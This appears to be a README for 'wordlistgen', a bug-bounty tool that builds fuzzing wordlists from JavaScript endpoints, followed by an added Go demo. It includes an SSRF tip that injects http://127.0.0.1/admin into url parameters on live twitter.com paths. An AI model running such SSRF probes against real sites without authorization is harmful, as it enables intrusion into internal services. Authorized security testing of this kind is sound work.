wordlistgen
Generates target-specific wordlists by searching for endpoints in JavaScript and appending parameters, for fuzzing with other tools.
Version 1.0
Install
$ go get -u github.com/ethicalhackingplayground/wordlistgen
$ go get github.com/003random/getJS
Generate wordlist
$ echo "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "https://www.twitter.com"
Then use ffuf
Get creative with ffuf or https://github.com/tomnomnom/qsreplace
SSRF TIP 2:
Generate Wordlist
$ cat <Resolved-Domains> | getJS -complete | ./wordlistgen -p params.txt -d <Un-Resolved> | tee wordlist
$ echo "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "www.twitter.com" | tee wordlist
OUTPUT:
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=FUZZ
www.twitter.com/v/latest/72x72//?url=FUZZ
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=FUZZ
www.twitter.com/articles/18311/?url=FUZZ
You can also use -dL to load a list of subdomains, like:
$ cat <Resolved-Domains> | getJS -complete | ./wordlistgen -p params.txt -dL <Un-Resolved> | tee wordlist
Replace Variables with Payload
$ cat wordlist | qsreplace http://127.0.0.1/admin | tee -a hosts
OUTPUT:
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/v/latest/72x72//?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/articles/18311/?url=http%3A%2F%2F127.0.0.1%2Fadmin
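As an added example (not wordlistgen's own code, nor qsreplace's), the following Go program reproduces the two steps shown above end to end: pull root-relative endpoints out of a JavaScript file, combine them with a parameter list into host/path/?param=FUZZ lines, and then substitute a value for FUZZ with the percent-encoding seen in the second OUTPUT block. The JavaScript snippet, host name, parameter names and substitution value are all constructed for the demo; in the real pipeline the script text comes from getJS and the parameters from params.txt. The same extraction doubles as a quick inventory of the endpoints a site's shipped JavaScript exposes, which is useful when reviewing what a deployment advertises.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// SampleJS is a constructed stand-in for a downloaded script; real input would
// come from getJS as in the README pipeline.
const SampleJS = `
fetch("/articles/18311").then(r => r.json());
const map = "/v/latest/72x72/";
const again = '/articles/18311';
const cdn = "//cdn.example";   // protocol-relative, not an endpoint on this host
const root = "/";
`

// endpointRe matches quoted root-relative paths such as "/articles/18311".
// Assumption: an endpoint starts with one "/" and contains only URL path chars.
var endpointRe = regexp.MustCompile(`["'](/[A-Za-z0-9_./-]*)["']`)

// ExtractEndpoints returns the unique root-relative paths quoted in js, in
// first-seen order, skipping "/" itself and protocol-relative "//host" strings.
func ExtractEndpoints(js string) []string {
	seen := map[string]bool{}
	var out []string
	for _, m := range endpointRe.FindAllStringSubmatch(js, -1) {
		p := m[1]
		if p == "/" || strings.HasPrefix(p, "//") || seen[p] {
			continue
		}
		seen[p] = true
		out = append(out, p)
	}
	return out
}

// BuildWordlist emits one "host/path/?param=FUZZ" line per endpoint and
// parameter name, the shape shown under OUTPUT above. A trailing slash on the
// endpoint is trimmed so the line never contains "//".
func BuildWordlist(host string, endpoints, params []string) []string {
	var lines []string
	for _, ep := range endpoints {
		path := strings.TrimSuffix(ep, "/")
		for _, p := range params {
			lines = append(lines, fmt.Sprintf("%s%s/?%s=FUZZ", host, path, p))
		}
	}
	return lines
}

// FillParam substitutes value for the FUZZ placeholder, percent-encoding it as
// a query value (":" -> %3A, "/" -> %2F), which is why the second OUTPUT block
// above shows an encoded URL rather than the raw one.
func FillParam(line, value string) string {
	return strings.Replace(line, "FUZZ", url.QueryEscape(value), 1)
}

func main() {
	params := []string{"url", "redirect"} // constructed stand-in for params.txt
	for _, line := range BuildWordlist("www.example.com", ExtractEndpoints(SampleJS), params) {
		fmt.Println(line)
	}
	// Constructed, benign substitution value.
	fmt.Println(FillParam("www.example.com/articles/18311/?url=FUZZ", "https://example.net/callback"))
}
```

Running it prints four FUZZ lines (two endpoints times two parameters) followed by one line with the substituted, percent-encoded value. The regex deliberately accepts only root-relative paths; absolute URLs and protocol-relative "//host" strings found in the script point at other hosts and would pollute a wordlist meant for one domain.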
Use httpx to keep track of the status codes and titles
$ cat hosts | httpx -title -status-code
I hope you get a bounty with this technique.
If you get a bounty, please support by buying me a coffee.